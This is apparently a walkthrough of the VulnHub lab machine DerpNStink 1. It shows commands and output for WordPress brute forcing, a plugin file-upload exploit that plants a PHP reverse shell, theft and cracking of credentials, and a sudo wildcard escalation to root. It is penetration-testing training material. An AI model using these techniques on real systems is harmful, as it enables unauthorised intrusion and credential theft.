Vulnhub - DERPNSTINK: 1
Introduction
Mr. Derp and Uncle Stinky are two system administrators who are starting their own company, DerpNStink. Instead of hiring qualified professionals to build up their IT landscape, they decided to hack together their own system which is almost ready to go live…
This box is on the NetSecFocus Admin list of OSCP-like machines. It’s DERPNSTINK: 1 from vulnhub. It’s got a Southpark theme, although it’s not overpowering (which I really appreciate) and I haven’t seen the episode so I don’t get the reference.
Ports
This box has FTP, SSH and HTTP on the standard ports (21, 22 and 80).
FTP
We have no anonymous access. Moving on…
HTTP
Robots.txt gives two disallowed entries; /php and /temporary. So we have a hint the server may be running PHP. The /php directory gives a 403, and the /temporary directory suggests we try harder!.
The page source on the webroot refers to /webnotes/info.txt, which says
@stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live
So maybe we have a username. Going back out to webnotes, we get:
[stinky@DeRPnStiNK /var/www/html ]$ whois derpnstink.local Domain Name: derpnstink.local
And some other similar stuff - so we definitely have a user called stinky and a domain called derpnstink.local. I add it to /etc/hosts.
Gobuster
Gobuster on /php turns up phpMyAdmin. So that’s interesting, but we’ll come back to it. We also find weblog in the webroot, which is the blog the earlier comment referred to. It’s running Wordpress, so let’s try wpscan:
root@kali:/opt/vulnhub/derpnstink# wpscan -e --url http://derpnstink.local/weblog
This turns up two users: unclestinky and admin. A password attack:
root@kali:/opt/vulnhub/derpnstink# wpscan --url http://derpnstink.local/weblog -U 'unclestinky,admin' -P /usr/share/seclists/Passwords/probable-v2-top12000.txt
quickly yields admin:admin, but nothing for unclestinky.
Logging in, our ‘admin’ user is not actually an administrator.
Plugin
wpscan also revealed a plugin - Slideshow Gallery 1.4.6 - which has an arbitrary file upload vulnerability. I mirror the python script from searchsploit and run it:
root@kali:/opt/vulnhub/derpnstink# python 34681.py -t http://derpnstink.local/weblog -u admin -p admin -f sh33l.php
Where sh33l.php is the pentestmonkey PHP reverse shell. It’s found at
http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/sh33l.php
And gives back a shell as www-data.
On the box
Enumeration with linpeas suggests the box probably should be vulnerable to multiple kernel exploits but I try a few quickly and they fail.
It also gives us the credentials for mysql:
[+] Searching Wordpress wp-config.php files
wp-config.php files found:
/var/www/html/weblog/wp-config.phpdefine('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'mysql');
define('DB_HOST', 'localhost');This looks like it is probably a dead end, but we try it in phpMyAdmin and it works. We can grab the hash from the wp-users table:
unclestinky:$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
I crack this in Hashcat on my Windows host machine:
PS C:\Users\David\Downloads\hashcat-5.1.0> .\hashcat64.exe -m 400 .\hash.txt .\rockyou.txt
hashcat (v5.1.0) starting...
$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41:wedgie57
Session..........: hashcat
Status...........: Cracked
Hash.Type........: phpass, WordPress (MD5), phpBB3 (MD5), Joomla (MD5)
Hash.Target......: $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
Time.Started.....: Thu Oct 22 21:09:21 2020 (10 secs)
Time.Estimated...: Thu Oct 22 21:09:31 2020 (0 secs)With this, we can su to the stinky account.
Stinky
Enumerating stinky we can find an SSH private key:
stinky@DeRPnStiNK:~/ftp/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh$ cat key.txtAnd once we copy the contents and chmod 600 we can SSH in as stinky and leave our shell behind.
More enumeration reveals a pcap file; might be interesting?
stinky@DeRPnStiNK:~$ cd Documents/
stinky@DeRPnStiNK:~/Documents$ ls -lash
total 4.2M
4.0K drwxr-xr-x 2 stinky stinky 4.0K Nov 13 2017 .
4.0K drwx------ 12 stinky stinky 4.0K Jan 9 2018 ..
4.2M -rw-r--r-- 1 root root 4.2M Nov 13 2017 derpissues.pcapDigging through this, we can find a password for the mrderp user:
POST /weblog/wp-admin/user-new.php HTTP/1.1
Host: derpnstink.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://derpnstink.local/weblog/wp-admin/user-new.php
Cookie: wp-saving-post=8-saved; wordpress_ef6a5fe14854bbc5e051bfac8b7603e7=unclestinky%7C1510725219%7CHPwFbs1B7NSefEO05QbhgUwtXobk0hhCbJT33eZsgek%7C6460ba6af109224bf369c32e37c430fd32a9ac320b4d978bc16d8a1f3ca99f9e; wp-settings-time-1=1510552441; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_ef6a5fe14854bbc5e051bfac8b7603e7=unclestinky%7C1510725219%7CHPwFbs1B7NSefEO05QbhgUwtXobk0hhCbJT33eZsgek%7C55f5ff022ece754f6aeb3642679a2074c97bd50b026460691164c8ec509acd34
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 366
action=createuser&_wpnonce_create-user=b250402af6&_wp_http_referer=%2Fweblog%2Fwp-admin%2Fuser-new.php&user_login=mrderp&email=mrderp%40derpnstink.local&first_name=mr&last_name=derp&url=%2Fhome%2Fmrderp&pass1=derpderpderpderpderpderpderp&pass1-text=derpderpderpderpderpderpderp&pass2=derpderpderpderpderpderpderp&pw_weak=on&role=administrator&createuser=Add+New+UserHTTP/1.1 302 Found
Date: Mon, 13 Nov 2017 05:54:58 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.22
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Location: users.php?update=add&id=3
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/htmlAnd with that, we can su as mrderp.
mrderp
The final privesc to root is perhaps the easiest - binaries in /home/mrderp/binaries/ named derpyNAME can be run as root. We already knew this from a file stored on the server in /support called troubleshooting.txt:
On one particular machine I often need to run sudo commands every now and then. I am fine with entering password on sudo in most of the cases.
However i dont want to specify each command to allow
How can I exclude these commands from password protection to sudo?
************************
Thank you for contacting the Client Support team. This message is to confirm that we have resolved and closed your ticket.
Please contact the Client Support team at https://pastebin.com/RzK9WfGw if you have any further questions or issues.
Thank you for using our product.
************************
Visting https://pastebin.com/RzK9WfGw we find this:
mrderp ALL=(ALL) /home/mrderp/binaries/derpy*
Let’s confirm that now:
mrderp@DeRPnStiNK:~$ sudo -l
sudo -l
[sudo] password for mrderp: derpderpderpderpderpderpderp
Matching Defaults entries for mrderp on DeRPnStiNK:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User mrderp may run the following commands on DeRPnStiNK:
(ALL) /home/mrderp/binaries/derpy*I haven’t encountered this exact scenario before - let’s try making a copy of bash.
mrderp@DeRPnStiNK:~/binaries$ cp /bin/bash derpybash
cp /bin/bash derpybash
mrderp@DeRPnStiNK:~/binaries$ sudo -u root /home/mrderp/binaries/derpybash
sudo -u root /home/mrderp/binaries/derpybash
root@DeRPnStiNK:~/binaries# whoami
whoami
rootAnd that was the end of derpnstink. Quite a few steps involved, and it was pretty good - thumbs up Bryan Smith.